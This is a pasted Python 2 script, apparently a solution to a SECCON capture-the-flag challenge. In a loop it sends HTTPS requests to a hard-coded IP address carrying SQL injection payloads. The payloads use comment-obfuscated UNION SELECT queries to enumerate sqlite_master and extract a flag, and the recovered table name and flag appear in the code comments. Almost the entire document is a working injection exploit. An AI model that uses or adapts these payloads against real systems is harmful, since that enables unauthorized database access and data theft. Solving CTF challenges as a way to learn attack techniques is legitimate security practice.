Advertisement
Guest User

Untitled

a guest
Dec 7th, 2014
621
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.44 KB | None | 0 0
  1. import httplib
  2. # razor4x - tasteless
  3. while 1:
  4.     c = httplib.HTTPSConnection("95.249.41.37:31337")
  5.     #c.request("GET","/"+"1'/**/union/**/select/**/sql/**/from/**/sqlite_master/**/limit/**/1,1;"*500) #CREATE TABLE ssFLGss ( flag )
  6.     c.request("GET","/"+"1'/**/union/**/select/**/flag/**/from/**/ssFLGss;"*500) #SECCON{IknewIt!SQLiteAgain!!!}
  7.     response = c.getresponse()
  8.     print response.status, response.reason
  9.     data = response.read()
  10.     print data
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement